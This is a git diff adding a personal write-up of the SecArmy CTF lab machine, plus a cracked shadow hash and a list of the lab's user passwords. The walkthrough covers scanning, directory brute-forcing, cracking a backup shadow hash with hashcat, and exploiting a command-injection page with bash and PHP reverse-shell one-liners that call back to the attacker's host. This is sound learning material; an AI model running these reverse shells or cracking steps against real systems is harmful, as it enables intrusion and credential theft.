diff --git a/SecarmyCTF/SecArmyOSCP.md b/SecarmyCTF/SecArmyOSCP.md
new file mode 100644
index 0000000..4d5bec6
--- /dev/null
+++ b/SecarmyCTF/SecArmyOSCP.md
@@ -0,0 +1,472 @@
+# Sec Army CTF
+
+>Abdullah Rizwan | 29 October , 6:12 PM
+
+## NMAP
+
+```
+Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
+Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
+Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
+Nmap scan report for 192.168.1.5
+Host is up (0.00012s latency).
+Not shown: 997 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 2.0.8 or later
+|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
+| ftp-syst:
+| STAT:
+| FTP server status:
+| Connected to ::ffff:192.168.1.7
+| Logged in as ftp
+| TYPE: ASCII
+| No session bandwidth limit
+| Session timeout in seconds is 300
+| Control connection is plain text
+| Data connections will be plain text
+| At session startup, client count was 1
+| vsFTPd 3.0.3 - secure, fast, stable
+|_End of status
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
+| 256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
+|_ 256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Totally Secure Website
+MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+
+```
+
+# Challenge 1 (Uno)
+
+By visting the web page which is hosted on PORT 80 we will given task 1 to solve
+
+
+
+Now it says that there might be a hidden directory so lets brute force directory
+
+```
+gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+```
+
+
+
+Here we can see `/anon` so let's visit this directory
+
+
+
+Now you won't see the text because it is hidden by making the text color white so it's important select all text or visit the source code of page
+
+
+
+This may be credentials for the user for ssh lets try doing that
+
+
+
+And we got in , got a foothold!
+
+
+
+We easily solved the challenge
+
+But there is a `readme.txt` file which says
+
+
+
+# Challenge 2 (Dos)
+
+The `readme.txt` file which you have just read gives password for the user `dos` lets see if that user actually exists on this box
+
+```
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+syslog:x:102:106::/home/syslog:/usr/sbin/nologin
+messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
+_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
+lxd:x:105:65534::/var/lib/lxd/:/bin/false
+uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
+dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+pollinate:x:109:1::/var/cache/pollinate:/bin/false
+sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
+uno:x:1001:1001:,,,:/home/uno:/bin/bash
+dos:x:1002:1002:,,,:/home/dos:/bin/bash
+tres:x:1003:1003:,,,:/home/tres:/bin/bash
+cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
+cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
+seis:x:1006:1006:,,,:/home/seis:/bin/bash
+siete:x:1007:1007:,,,:/home/siete:/bin/bash
+ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
+nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
+ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
+cero:x:1000:1000:,,,:/home/cero:/bin/bash
+
+```
+And appearenlty he does ! So let's try to use switch user
+
+
+
+
+We successfully switched to `don`
+
+```
+dos@svos:~$ ls -la
+total 180
+drwx------ 7 dos dos 4096 Oct 19 19:46 .
+drwxr-xr-x 12 root root 4096 Oct 19 11:05 ..
+-rw-rw-r-- 1 dos dos 47 Oct 5 09:24 1337.txt
+-rw-r--r-- 1 dos dos 220 Sep 22 11:36 .bash_logout
+-rw-r--r-- 1 dos dos 3771 Sep 22 11:36 .bashrc
+drwx------ 2 dos dos 4096 Sep 22 12:49 .cache
+drwx------ 2 dos dos 4096 Sep 22 13:59 .elinks
+drwxr-xr-x 2 dos dos 135168 Sep 27 14:51 files
+drwx------ 3 dos dos 4096 Sep 22 12:49 .gnupg
+drwxrwxr-x 3 dos dos 4096 Sep 22 13:24 .local
+-rw-r--r-- 1 dos dos 807 Sep 22 11:36 .profile
+-rw-rw-r-- 1 dos dos 104 Sep 23 09:52 readme.txt
+dos@svos:~$ cat readme.txt
+You are required to find the following string inside the files folder:
+a8211ac1853a1235d48829414626512a
+dos@svos:~$
+
+```
+
+Now this says to find `a8211ac1853a1235d48829414626512a` this string which actually a md5 hash in folder `files` but problem is that that folder has 5001 text files
+
+
+
+To be honest I did'nt know the command for looking for a text in files so I just used google
+
+
+
+That returned me the result that I wanted
+
+
+
+
+
+
+Now it's telling you to look at `file3131.txt` which gives us
+
+
+
+```
+UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
+tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
+L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
+dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
+IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
+80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
+AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
+3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
+AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
+UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
+dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
+AQAAPgEAAAAA
+```
+If you have done some CTF's the works thing that should come to your mind is that this is a base64 encoded text :D
+
+Head over to `cyberchef`
+
+
+
+You might see something like this `challenge2/flag2.txt`
+
+Hover your curosr next to `Output` on that something like a magic stick icon and you'll get your second flag
+
+
+
+We can see a text from `todo.txt`
+
+```
+Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
+```
+
+# Challegne 3 (Tres)
+
+As on the user dos's directory we can see a hint that
+
+```
+dos@svos:~$ cat 1337.txt
+Our netcat application is too 1337 to handle..
+```
+This refers to port `1337` on the box so
+
+
+
+I tried looking for a parameter `?p=1` , `?secret=2`, `?token=3` , `?waste=3` but since this isn't a php file hosted these won't work
+
+
+
+Then I focused on the hint and it was mentioned `netcat application is too 1337 to handle` . I quickly visited goolge for answers
+
+https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit
+
+I did find something
+
+
+
+echo that token and pipe it to `netcat` by specifing IP and port
+
+
+
+# Challenge 4 (Cuatro)
+
+Now we are in as `tres` so let's start exploring his `home` directory
+
+
+
+
+
+Now we are presented with a binary exploitation challenge(Buffer Overflow) , we can see a binary file `secarmy-village` . But running it gives us an error
+
+
+
+
+I couldn't figure it out what was I supposed to fix in this binary , I had an idea to do something with `ghidra` but I failed to do it .
+
+# Challenge 5 (Cinco)
+
+when you visit `/var/www/html` this is where your webpage are being hosted , on visiting we can find directories and webpages there
+
+
+
+`anon` directory was the one which we came to know through `gobuster` so we know that these will be shown or port80 , let's try `justanothergallery`
+
+
+
+It has an `index.php` page and a sub directory of `qr` which contains a lot of qr code images that we scan
+
+
+We can this qr code from any qr android application which can be downloaded through playstore or from wherever you prefer
+
+By scanning this qr code we will get the text `presented`
+
+```
+image-0 Hello
+image-1 and
+image-2 congrats
+image-3 for
+image-4 solving
+image-5 this
+image-6 challenge,
+image-7 we
+image-8 hope
+image-9 that
+image-10 you
+image-11 enojoyed
+image-12 the
+image-13 challenges
+image-14 we
+image-15 presented
+image-16 so
+image-17 far.
+image-18 It
+image-19 is
+image-20 time
+image-21 for
+image-22 us
+image-23 to
+image-24 increase
+image-25 the
+image-26 difficulty
+image-27 level
+image-28 and
+image-29 make
+image-30 the
+image-31 upcoming
+image-32 challenges
+image-33 more
+image-34 challenging
+image-35 than
+image-36 previous
+image-37 ones.
+image-38 Before
+image-39 you
+image-40 move
+image-41 to
+image-42 the
+image-43 next
+image-44 challenge,
+image-45 here
+image-46 are
+image-47 the
+image-48 credentials
+image-49 for
+image-50 the
+image-51 5th
+image-52 user
+image-53 cinco:ruy70m35
+image-54 head
+image-55 over
+image-56 to
+image-57 this
+image-58 user
+image-59 and
+image-60 get
+image-61 your
+image-62 5th
+image-63 flag!
+image-64 goodluck
+```
+Ahhhh , so I scanned the 64 qr images through my phone and got credentials for `cinco:ruy70m35`
+
+
+
+
+
+
+Now the `readme.txt` says
+
+```
+cinco@svos:~$ cat readme.txt
+Check for Cinco's secret place somewhere outside the house
+cinco@svos:~$
+
+```
+By "looking outside the house" it means to look outside the `~` (home) directory
+
+Here we find `cincos-secrets`
+
+
+
+This is all we get at `cincos-secrets`
+
+
+
+We know that `shadow.bak` which is backup of the original `shadow` file belongs to `cincos` so we can change permissions for the file since it belongs to us
+
+It doesn't matter which permissions you give but in a real sceanrio you should give permissions to that specific user like this
+
+`chmod u+rwx shadow.bak` or depending upon the type of file it is
+Or
+
+`chmod 700 shadow.bak`
+
+
+On reading file we will see a hash
+
+```
+seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::
+```
+We already know from the hint that we need to user `rockyou.txt`
+
+Copy this whole hash and put it in a file , not necessary to give a `txt` extension. Now you can either use `john the ripper` or `hashcat` , for me `john the ripper` was taking too long so I used hashcat (although it doesn't work sometimes on windows but it dit work :D)
+
+```
+hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx
+```
+
+
+
+
+
+
+
+#Challenge 6 (Seis)
+
+
+
+I didn't solve this one in order xD
+
+
+# Challenge 7 (Siete)
+
+Visiting `/var/www/html` we will see `shellcmsdashboard` so lets hop over to that directory
+
+
+
+
+
+
+
+
+Coming back to the box , we can a `robots.txt` by reading it we can a password there
+
+
+
+On giving the right credentials , it's going to point us to go on the next page
+
+
+
+
+
+
+Now this here is a RCE vulnerability , we can give any command we want and it will execute this for us
+
+
+
+Now we have seen that there was `readme9213.txt` we can easily read it because we are `www-data` in this case and that file belongs it .
+
+
+But doing `cat readme9213.txt ` won't give us the result so we need a reverse shell in order to read that file.
+
+http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+
+bash -i >& /dev/tcp/192.168.1.7/4444 0>&1 - This did'nt worked
+php -r '$sock=fsockopen("192.168.1.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");' This did
+
+
+
+
+
+We cannot read the file because it's permissions are to just `write` and `execute` but since it belongs to us we can pretty much change it to readable.
+```
+/var/www/html/shellcmsdashboard
+$ cat readme9213.txt
+cat: readme9213.txt: Permission denied
+$ ls -la
+total 24
+drwxrwxrwx 2 root root 4096 Oct 18 15:02 .
+drwxr-xr-x 5 root root 4096 Oct 8 17:51 ..
+-rwxrwxrwx 1 root root 1459 Oct 1 17:57 aabbzzee.php
+-rwxrwxrwx 1 root root 1546 Oct 18 15:02 index.php
+--wx-wx-wx 1 www-data root 48 Oct 8 17:54 readme9213.txt
+-rwxrwxrwx 1 root root 58 Oct 1 17:37 robots.txt
+$ chmod u=rwx readme9213.txt
+$ cat readme9213.txt
+password for the seventh user is 6u1l3rm0p3n473
+$
+
+```
+
+
+
+
+
+
+Hint is given which tells that the message is a decimal text
+
+
+
+On decoding the message from deciaml we get
+
+
+
+I wasn't able to solve this challenge so couldn't proceed any further.
+
+# End
+
+So I didn't see what did the remaining challenges looked like , although it was easy but I didn't had that much exposure to CTF competitions.
+
diff --git a/SecarmyCTF/cracked.txt b/SecarmyCTF/cracked.txt
new file mode 100644
index 0000000..9e5abf6
--- /dev/null
+++ b/SecarmyCTF/cracked.txt
@@ -0,0 +1 @@
+$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:Hogwarts
diff --git a/SecarmyCTF/hash b/SecarmyCTF/hash
new file mode 100644
index 0000000..a9064b6
--- /dev/null
+++ b/SecarmyCTF/hash
@@ -0,0 +1 @@
+seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::
\ No newline at end of file
diff --git a/SecarmyCTF/passwords.txt b/SecarmyCTF/passwords.txt
new file mode 100644
index 0000000..b0dffbd
--- /dev/null
+++ b/SecarmyCTF/passwords.txt
@@ -0,0 +1,7 @@
+uno:luc10r4m0n (ssh password)
+dos:4b3l4rd0fru705 (account password)
+cinco:ruy70m35 (ssh password)
+siete:6u1l3rm0p3n473 (ssh password)
+tres:r4f43l71n4j3r0 (ssh password)
+seis:Hogwarts(potential password)
+Shell CMS passowrd admin:qwerty